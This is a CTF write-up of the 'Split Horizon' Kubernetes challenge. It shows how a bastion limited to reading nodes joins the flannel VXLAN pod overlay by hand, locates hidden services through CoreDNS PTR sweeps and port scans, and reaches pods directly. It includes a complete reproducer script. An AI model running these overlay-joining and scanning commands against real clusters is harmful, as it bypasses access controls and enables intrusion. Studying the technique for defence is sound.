What is a flannel VXLAN overlay in Kubernetes?

Flannel VXLAN is a Kubernetes pod network overlay that encapsulates pod-to-pod traffic in UDP packets (VXLAN, port 8472), allowing pods on different nodes to communicate as if they were on the same L2 network. Each node publishes its VTEP MAC and underlay IP as annotations on its Node object, which flannel uses to build forwarding tables on every other node.

How does kube-proxy handle Kubernetes Services with no endpoints?

When a Kubernetes Service has no backing endpoints, kube-proxy still installs an iptables DNAT rule for the ClusterIP, but with no targets to forward to. Traffic to the ClusterIP is silently dropped at the iptables layer with no ICMP response, making the Service appear to time out rather than refuse connections.

Can a bastion join a Kubernetes pod overlay without registering as a node?

Yes. Node objects publish flannel VXLAN configuration (VNI, VTEP MAC, underlay IP) as annotations. With only get/list permissions on nodes, an attacker can read these annotations and manually create a matching VXLAN device, populate FDB and ARP tables, and route pod CIDRs through it, joining the overlay without creating any Kubernetes resources. The return path requires sourcing inner packets from the bastion's underlay IP so pods reply as plain L3 traffic instead of needing FDB entries on the nodes.

How do you prevent unauthorized cluster overlay access from a bastion?

Place bastions in separate network segments rather than on the same Docker bridge or VPC subnet as cluster nodes, use NetworkPolicies and admission controllers to restrict node annotations and pod ingress, avoid granting get/list on nodes to low-privilege accounts that don't need it, and prefer separate clusters for diagnostic versus production workloads. Defense in depth should not assume API-level RBAC blocks data-plane participation.

Split Horizon CTF: Joining a Kubernetes Pod Overlay from Outside the Cluster

Challenge: Split Horizon

Author: Mohit Gupta / Skybound

Platform: Wiz Cloud Security Championship

Category: Cloud Security / Kubernetes Networking

Reading Time: 22 min

Split Horizon CTF: Challenge Brief

A Kubernetes team split a sensitive diagnostics endpoint away from the normal access path after an incident review. The bastion account can see only node-level metadata.

You have shell access to a bastion inside the lab. Map the network from what the nodes reveal, discover the hidden endpoint through DNS, and reach it without creating any Kubernetes resources.

Author's note: "There are a lot of weird quirks with Kubernetes and containers in general. This challenge shows a nice fun one. I've used variations of this technique on a client engagement to get to some containers that I shouldn't have been able to reach as part of a larger attack path."

Hint 1: Node-only does not mean blind. Start by mapping what the bastion account can list.

Hint 2: Cluster DNS can answer questions even when the API will not list Services for you.

Hint 3: Reverse-looking-up cluster IPs can reveal the endpoint name. Nodes still know how to deliver the traffic.

Useful starting points dropped on the lab shell:

kubectl auth can-i --list
kubectl get nodes -o json
dig @<dns-server> -x <cluster-ip>
ip addr
ip route
tcpdump -ni eth0

Split Horizon Lab Environment

Cluster:               k3d (k3s 1.31.5+k3s1, flannel VXLAN backend)
Underlay (Docker):     172.30.0.0/16 - research-lab-network
  172.30.0.1           docker bridge gateway
  172.30.0.2           master-1   (k3s server, control-plane)
  172.30.0.3           worker-2
  172.30.0.4           worker-1
  172.30.0.5           bastion (us)
Pod CIDRs:
  master-1             10.42.0.0/24
  worker-1             10.42.1.0/24
  worker-2             10.42.2.0/24
Service CIDR:          10.43.0.0/16
Cluster DNS (decoy):   10.43.0.10  (Service exists, has no endpoints)
Identity:              system:serviceaccount:kube-system:bastion-viewer

The bastion is itself a Docker container on the same research-lab-network bridge as all three k3s nodes. Flat L2 connectivity to the underlay, no L3 hops between us and the nodes. That detail ends up mattering a lot.

Split Horizon TL;DR

The bastion has only get/list nodes on a k3d cluster, and the cluster DNS Service kube-dns at 10.43.0.10 has been deliberately gutted of endpoints. kube-proxy installs an iptables rule for it, but with no backends it silently drops every packet. The --cluster-dns flag advertised by kubelet is a decoy.

Node objects still publish their flannel VXLAN annotations (VTEP MAC and underlay IP), which is enough information to manually join the pod overlay as a peer from the bastion. The non-obvious trick that makes the return path work is sourcing inner packets from the bastion's underlay IP: pods then reply directly to the bastion as plain L3 traffic on the Docker bridge, with no need for any node to learn our VTEP MAC and no Kubernetes resources created.

From there it's classic DNS recon: query the real CoreDNS at its pod IP, PTR-sweep the service CIDR to find the hidden endpoint name (flag-server.target.svc.cluster.local at 10.43.0.37), SRV query for the port (31337), and connect to the pod IP directly because the Service VIP routes don't reach kube-proxy correctly for our source. The flag-server is a small TCP server that responds to the literal command flag.

Phase 1: Mapping the Bastion's RBAC

kubectl auth can-i --list

Came back showing nodes [get list] plus the standard non-resource discovery URLs (/api, /apis, /healthz). Every other resource was forbidden:

services         - forbidden
endpoints        - forbidden
endpointslices   - forbidden  (different RBAC than 'endpoints', also forbidden)
configmaps       - forbidden
namespaces       - forbidden
pods             - forbidden
events           - forbidden
nodes/proxy      - forbidden
nodes/log        - forbidden
nodes/stats      - forbidden
leases           - forbidden
create/patch *   - forbidden

Gotcha: kubectl auth can-i lied for some node subresources. It returned yes for nodes/proxy, nodes/log, nodes/configz, etc., but actual API calls came back forbidden ("cannot get resource 'nodes/proxy' in API group ''"). The only reliable check is making the call.

The kubeconfig held a single SA token (bastion-viewer in kube-system). No Docker socket mounted, no other kubeconfigs on disk, no admin contexts, no readable secret stash. The credential surface is genuinely a single low-privilege SA.

Phase 2: Reading What Nodes Reveal

kubectl get nodes -o json | jq '.items[] | {name, addresses: .status.addresses, podCIDR: .spec.podCIDR, annotations: .metadata.annotations}'

The k3s server flags appear right in the node annotations:

master-1:
  k3s.io/node-args = ["server","--node-name","master-1",
    "--service-cidr","10.43.0.0/16",
    "--cluster-dns","10.43.0.10",
    "--flannel-backend","vxlan",
    "--disable-network-policy",
    "--disable","traefik,metrics-server,servicelb,local-storage",
    "--kube-apiserver-arg","watch-cache=false",
    "--kube-apiserver-arg","event-ttl=10m",
    "--tls-san","0.0.0.0"]

watch-cache=false and event-ttl=10m are deliberately defensive. The author wanted to limit info leakage through events and watch streams.

The interesting annotations on every node are flannels:

flannel.alpha.coreos.com/backend-data = {"VNI":1,"VtepMAC":"<mac>"}
flannel.alpha.coreos.com/backend-type = vxlan
flannel.alpha.coreos.com/public-ip    = <node underlay IP>

That gives us, for free:

Node	Underlay IP	Pod CIDR	VTEP MAC
master-1	`172.30.0.2`	`10.42.0.0/24`	`72:6c:75:ba:48:cb`
worker-1	`172.30.0.4`	`10.42.1.0/24`	`9e:dd:0e:f3:9b:8e`
worker-2	`172.30.0.3`	`10.42.2.0/24`	`4a:95:90:04:46:ab`

This is all the information needed to construct a flannel VXLAN peer. No node registration required, no Kubernetes resource creation.

Phase 3: The Decoy DNS Service

First obvious move: try the cluster DNS.

ip route add 10.43.0.0/16 via 172.30.0.4 dev eth0
dig @10.43.0.10 cluster.local SOA +time=3 +tries=1

Times out. Both UDP and TCP. Identical via every node gateway (172.30.0.2/3/4). With tcpdump, the bastion sends but nothing comes back. Not a reply, not even an ICMP unreachable.

Compare to the kube API:

$ curl -sk https://10.43.0.1/healthz
# returns 401 in 8ms

The API VIP at 10.43.0.1 works fine through the same path. So routing isn't the problem; the kube-dns Service simply has no endpoints behind it. kube-proxy installs an iptables rule for the ClusterIP, but with no backends to DNAT to, traffic gets silently dropped at the rule. The --cluster-dns=10.43.0.10 advertised by kubelet is a misdirection. The real CoreDNS pod is alive somewhere; we just have to bypass the broken Service to talk to it.

Confirmed dead ends ruled out at this stage:

TCP/UDP port scans across 10.43.0.0/24 and a sample of other /24s in the service CIDR (only the API VIP responds; no second DNS service)
Direct TCP/UDP/53 (and 853, 1053, 5353, 8053, 9053, 9153) to all four underlay IPs (every port returned connection refused; no host-network DNS)
NodePort UDP scans on all three nodes (no NodePort DNS service exists)
Docker DNS at 127.0.0.11 (knows the four research-lab-network containers and nothing else)
API enumeration via --raw paths (/api/v1/services, /apis/discovery.k8s.io/v1/endpointslices, /api/v1/nodes/<n>/proxy/pods, etc.), all forbidden
Direct kubelet on :10250 and the deprecated read-only port :10255 (all 401/closed)
Source-IP spoofing onto a pod-CIDR alias on eth0 (encap not happening, return path broken)
Searching for alternate kubeconfigs, Docker sockets, or admin tokens (none exist)

Phase 4: Building a Flannel VXLAN Peer from Outside

The plan: create a VXLAN device on the bastion with the same VNI and UDP port as flannel, manually populate FDB and ARP tables from the node annotations, and route the pod CIDRs through it.

ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1   # cosmetic, never used as src

FDB entries, how to encap to each node's VTEP MAC:

bridge fdb append 72:6c:75:ba:48:cb dev flannel.1 dst 172.30.0.2 self permanent
bridge fdb append 9e:dd:0e:f3:9b:8e dev flannel.1 dst 172.30.0.4 self permanent
bridge fdb append 4a:95:90:04:46:ab dev flannel.1 dst 172.30.0.3 self permanent

Static ARP for each node's pod-CIDR gateway (.X.0):

ip neigh add 10.42.0.0 lladdr 72:6c:75:ba:48:cb dev flannel.1
ip neigh add 10.42.1.0 lladdr 9e:dd:0e:f3:9b:8e dev flannel.1
ip neigh add 10.42.2.0 lladdr 4a:95:90:04:46:ab dev flannel.1

Routes via flannel.1 to each pod CIDR:

ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink

A tcpdump confirms the VXLAN encap is correct (OTV/8472, VNI=1), packets arrive at the right destination underlay IPs. But nothing comes back. Every probe was outbound only.

That makes sense: the receiving node has no FDB entry mapping our flannel.1 MAC to our underlay IP. When a pod replies to 10.42.99.0, the host node looks up the route, encaps to our MAC, consults its FDB to find the underlay endpoint for that MAC… and finds nothing. The reply gets dropped silently.

We can't add FDB entries on the nodes (we have no root there), and creating a Node object to make flannel auto-distribute our MAC would violate the "no Kubernetes resources" rule.

Phase 5: Source from the Bastion's Underlay IP

The fix turns out to be small and elegant. Linux's ip route lets us specify a source IP per-route:

ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink src 172.30.0.5

Now when we encap a packet to a pod, the inner packet's source is 172.30.0.5, the bastion's underlay IP, an address that exists on the same Docker bridge as every node.

When the pod replies:

Pod sends its reply to 172.30.0.5.
Its host node looks up the route to 172.30.0.5.
172.30.0.5 is on the node's eth0 (Docker bridge), not in any pod CIDR.
Reply leaves the node as a plain L3 packet on the underlay via the node's default gateway.
Docker bridge delivers it directly to bastion.

No FDB lookup. No VXLAN encap on the return path. No node-side cooperation needed. The pod's reply comes back as normal IP traffic on eth0, just like any other underlay packet.

Confirmation on the wire:

14:00:09.311079 IP 172.30.0.5.50478 > 172.30.0.4.8472: OTV ... 10.42.1.2.53: SOA?
14:00:09.311692 IP 10.42.1.2.53 > 172.30.0.5.50478: SOA (147)

Outbound was VXLAN-encapped, inbound was plain L3, and bastion's userspace got the answer:

$ dig @10.42.1.2 cluster.local SOA +time=3 +tries=1
;; ANSWER SECTION:
cluster.local.   5  IN  SOA  ns.dns.cluster.local. hostmaster.cluster.local. ...

That makes Hint 2 work.

Phase 6: Finding the Hidden Endpoint via PTR Sweep

CoreDNS lives on 10.42.1.2 (worker-1). With it answering, Hint 3 falls out as a one-liner:

for i in $(seq 1 254); do
  ans=$(dig @10.42.1.2 -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
  [[ -n "$ans" ]] && echo "10.43.0.$i -> $ans"
done

Output:

10.43.0.1  -> kubernetes.default.svc.cluster.local.
10.43.0.10 -> kube-dns.kube-system.svc.cluster.local.   <- the decoy
10.43.0.37 -> flag-server.target.svc.cluster.local.     <- the target

The hidden service is in a non-obvious namespace (target) called flag-server. CoreDNS's PTR responses leak the FQDN, namespace, and ClusterIP all at once.

A SRV query reveals the port:

$ dig @10.42.1.2 SRV flag-server.target.svc.cluster.local +short
0 100 31337 flag-server.target.svc.cluster.local.

Port 31337. (Of course it's leetspeak.)

Phase 7: Reaching the Pod Directly

Routing the service CIDR through worker-1 with src 172.30.0.5 for TCP just like DNS gave us a connection timed out to 10.43.0.37:31337. The return-path trick that worked for UDP/53 didn't work the same way through kube-proxy DNAT for this TCP flow. Rather than debug the asymmetry, sweep the pod CIDRs directly on :31337 over our working overlay:

for cidr in 10.42.0 10.42.1 10.42.2; do
  for i in $(seq 2 30); do
    ip="$cidr.$i"
    timeout 1 bash -c "echo > /dev/tcp/$ip/31337" 2>/dev/null && echo "OPEN: $ip:31337"
  done
done
# OPEN: 10.42.1.4:31337

Direct connect to 10.42.1.4:31337 works.

$ curl -v --max-time 5 http://10.42.1.4:31337/
* Connected to 10.42.1.4 (10.42.1.4) port 31337 (#0)
> GET / HTTP/1.1
flag input: nope
* Recv failure: Connection reset by peer

Server speaks raw TCP (HTTP/0.9-ish), reads whatever bytes the client sends, looks for a magic word, and replies flag input: nope for anything it doesn't recognize. After a quick command-discovery round:

$ printf "flag\n" | nc -w 3 10.42.1.4 31337
flag input: WIZ_CTF{REDACTED}

The literal command flag returns the flag.

Split Horizon CTF Flag

WIZ_CTF{REDACTED}

Split Horizon Attack Chain

Read flannel VXLAN annotations off Node objects
    |
    v
Build a VXLAN peer on the bastion (no Node registration)
    |
    v
Source inner packets from bastion's underlay IP
    so pod replies route back as plain L3 traffic
    |
    v
Query the real CoreDNS at its pod IP (Service VIP is a decoy)
    |
    v
PTR-sweep the service CIDR to discover flag-server.target.svc
    |
    v
SRV query for the port (31337)
    |
    v
Connect to the flag-server pod IP directly over the overlay
    |
    v
Send literal command 'flag', server returns the flag

Split Horizon Kubernetes Lessons Learned

What nodes publish about themselves can be enough to join the network they live on. Flannel annotations exist for a reason (flannel itself uses them), but they're equally useful to anyone with get nodes.
Service VIPs are not the network; they're a kube-proxy iptables rule that may or may not work. A Service with no endpoints silently drops traffic; pod IPs don't.
Source IP selection is a routing decision, not just a socket option. ip route … src <addr> lets you control which address upstream sees, and that choice can dictate whether the return path is encapsulated, routed, or dropped.
Flat L2 plus an overlay is one shared fabric. Segmentation that depends on "you can't see the pod network" assumes attackers won't reconstruct the overlay from public metadata. They will.
kubectl auth can-i can lie about node subresources. It returned yes for nodes/proxy, nodes/log, and nodes/configz, but real API calls came back forbidden. Always verify by making the call.

Split Horizon One-Shot Reproducer

This script reproduces the entire solution from a fresh bastion and ends by printing the flag.

#!/bin/bash
# ============================================================================
# Wiz Cloud Security Championship #11 - Split Horizon
# Author: Mohit Gupta / Skybound
# Solution: one-shot reproducer from a fresh bastion
# ============================================================================
# Premise: bastion has only `get nodes` on a k3d cluster. The flag-server is a
# Kubernetes Service the API will not enumerate. We get to it by:
#   1. Reading flannel VXLAN annotations off node objects
#   2. Manually joining the pod overlay as a peer (no node registration)
#   3. Sourcing inner packets from bastion's underlay IP so replies come back
#      as plain L3 traffic (the "weird quirk")
#   4. Querying CoreDNS directly at its pod IP (Service VIP has no endpoints)
#   5. PTR-sweeping the service CIDR to find flag-server's name
#   6. SRV query to find the listening port
#   7. Hitting the flag-server pod IP directly via the overlay
#   8. Sending the literal command 'flag' - server returns the flag string
# ============================================================================

set -e

echo "=== [0] Setup ==="
apt update -qq && apt install -y -qq nmap dnsutils tcpdump bridge-utils netcat-openbsd >/dev/null

echo ""
echo "=== [1] Map the network from node annotations (Hint 1) ==="
NODES_JSON=$(kubectl get nodes -o json)
echo "$NODES_JSON" | jq -r '.items[] | "\(.metadata.name)  underlay=\(.metadata.annotations["flannel.alpha.coreos.com/public-ip"])  podCIDR=\(.spec.podCIDR)  vtep=\(.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC)"'

declare -A NODE_IP NODE_VTEP NODE_PODCIDR
while IFS=$'\t' read -r name underlay vtep podcidr; do
  NODE_IP[$name]=$underlay
  NODE_VTEP[$name]=$vtep
  NODE_PODCIDR[$name]=$podcidr
done < <(echo "$NODES_JSON" | jq -r '.items[] | [.metadata.name, .metadata.annotations["flannel.alpha.coreos.com/public-ip"], (.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC), .spec.podCIDR] | @tsv')

echo ""
echo "=== [2] Build flannel overlay peer ==="
ip link del flannel.1 2>/dev/null || true
for c in 0 1 2; do ip route del 10.42.$c.0/24 2>/dev/null || true; done
ip route del 10.43.0.0/16 2>/dev/null || true

# Same VNI/dstport as flannel
ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1   # cosmetic; not used as src

# Populate FDB and ARP from node annotations
for name in "${!NODE_IP[@]}"; do
  bridge fdb append "${NODE_VTEP[$name]}" dev flannel.1 dst "${NODE_IP[$name]}" self permanent
  gw=$(echo "${NODE_PODCIDR[$name]}" | sed 's|/.*||')
  ip neigh replace "$gw" lladdr "${NODE_VTEP[$name]}" dev flannel.1
done

# KEY TRICK: src 172.30.0.5 forces inner packets to be sourced from bastion's
# underlay IP, so pod replies route back as plain L3 traffic via the node's
# default gateway → docker bridge → us. No need for the receiving node to
# know our VTEP MAC.
BASTION_IP=$(ip -4 -o addr show eth0 | awk '{print $4}' | cut -d/ -f1)
for name in "${!NODE_PODCIDR[@]}"; do
  cidr="${NODE_PODCIDR[$name]}"
  gw=$(echo "$cidr" | sed 's|/.*||')
  ip route add "$cidr" via "$gw" dev flannel.1 onlink src "$BASTION_IP"
done

echo "Routes:"
ip route show | grep 10.42

echo ""
echo "=== [3] Find CoreDNS pod by sweeping pod CIDRs (Hint 2) ==="
COREDNS_IP=""
for name in "${!NODE_PODCIDR[@]}"; do
  cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
  for i in $(seq 2 20); do
    ip="$cidr_base.$i"
    ans=$(timeout 1 dig @"$ip" cluster.local SOA +short +time=1 +tries=1 2>/dev/null | head -1)
    if [[ -n "$ans" ]] && [[ "$ans" != *"error"* ]] && [[ "$ans" != *"timed out"* ]]; then
      echo "CoreDNS found: $ip ($ans)"
      COREDNS_IP="$ip"
      break 2
    fi
  done
done
[[ -z "$COREDNS_IP" ]] && { echo "ERROR: no CoreDNS pod found"; exit 1; }

echo ""
echo "=== [4] PTR-sweep service CIDR to find target service (Hint 3) ==="
TARGET_SVC=""
TARGET_VIP=""
for i in $(seq 1 254); do
  ans=$(dig @"$COREDNS_IP" -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
  if [[ -n "$ans" ]]; then
    echo "10.43.0.$i -> $ans"
    if [[ "$ans" != *"kubernetes.default"* ]] && [[ "$ans" != *"kube-dns"* ]]; then
      TARGET_SVC="${ans%.}"
      TARGET_VIP="10.43.0.$i"
    fi
  fi
done
[[ -z "$TARGET_SVC" ]] && { echo "ERROR: no target service found"; exit 1; }
echo "Target: $TARGET_SVC @ $TARGET_VIP"

echo ""
echo "=== [5] SRV query to learn the port ==="
SRV_LINE=$(dig @"$COREDNS_IP" SRV "$TARGET_SVC" +short)
echo "SRV: $SRV_LINE"
TARGET_PORT=$(echo "$SRV_LINE" | awk '{print $3}')
[[ -z "$TARGET_PORT" ]] && { echo "ERROR: no SRV port"; exit 1; }
echo "Port: $TARGET_PORT"

echo ""
echo "=== [6] Find target pod IP (Service VIP isn't reachable for our source) ==="
TARGET_POD=""
for name in "${!NODE_PODCIDR[@]}"; do
  cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
  for i in $(seq 2 30); do
    ip="$cidr_base.$i"
    if timeout 1 bash -c "echo > /dev/tcp/$ip/$TARGET_PORT" 2>/dev/null; then
      echo "Target pod open: $ip:$TARGET_PORT"
      TARGET_POD="$ip"
      break 2
    fi
  done
done
[[ -z "$TARGET_POD" ]] && { echo "ERROR: no pod listening on $TARGET_PORT"; exit 1; }

echo ""
echo "=== [7] Submit 'flag' command - server responds with the flag ==="
echo "==============================================="
RESPONSE_FILE=$(mktemp)
printf 'flag\n' | nc -w 3 "$TARGET_POD" "$TARGET_PORT" > "$RESPONSE_FILE" 2>/dev/null || true
cat "$RESPONSE_FILE"
echo "==============================================="
if ! grep -qE 'WIZ_CTF\{' "$RESPONSE_FILE"; then
  cat <<EOF

No flag in the response. This SHOULD work, so something is off.

Likely causes:
  - The CTF lab timed out; flag-server has been reaped.
  - Pod IP $TARGET_POD got recycled to a different workload
    (port $TARGET_PORT happens to be open, but it is not flag-server now).
  - Some flag servers only respond once per source IP - try a fresh lab session.

Re-run the request manually (output goes straight to your terminal,
which sidesteps any stdio-buffering weirdness):

  printf 'flag\n' | nc -w 3 $TARGET_POD $TARGET_PORT

If that is also silent, re-discover any pod listening on port $TARGET_PORT:

  for cidr in 10.42.0 10.42.1 10.42.2; do
    for i in \$(seq 2 30); do
      timeout 1 bash -c "echo > /dev/tcp/\$cidr.\$i/$TARGET_PORT" 2>/dev/null \\
        && echo "\$cidr.\$i"
    done
  done

EOF
fi
rm -f "$RESPONSE_FILE"

Split Horizon CTF: Final Thoughts

Split Horizon is a beautiful demonstration of a recurring lesson in Kubernetes security: the API surface and the network surface are two different things, and the network does not care what RBAC says. The bastion's role bound it to get/list nodes and nothing else, which sounds tightly scoped, until you remember that nodes publish enough information to participate in the cluster's data plane, and the data plane runs on the same flat L2 segment the bastion lives on.

The source-IP trick (sourcing inner packets from the underlay IP so replies come back as plain L3 traffic) is the kind of small, elegant move that turns a stuck overlay into a working one. It exploits no bug. Linux's routing table did exactly what it was told to do; the pod's host node did exactly what it was told to do; flannel forwarded a packet whose inner header pointed at an address it didn't try to encap. Each link in the chain is "working as intended." It just so happens that those intentions, composed, hand an attacker a working overlay peer with no node-side cooperation.

The decoy kube-dns Service is a nice touch on the puzzle side; it teaches that a Kubernetes Service is just a kube-proxy iptables rule, and that a rule with no endpoints behind it silently drops traffic rather than refusing it. The lesson generalises: ClusterIPs are an abstraction over routing, and abstractions over routing fail in ways routers don't.

Challenge created by Mohit Gupta / Skybound as part of the Wiz Cloud Security Championship. Writeup completed: May 2026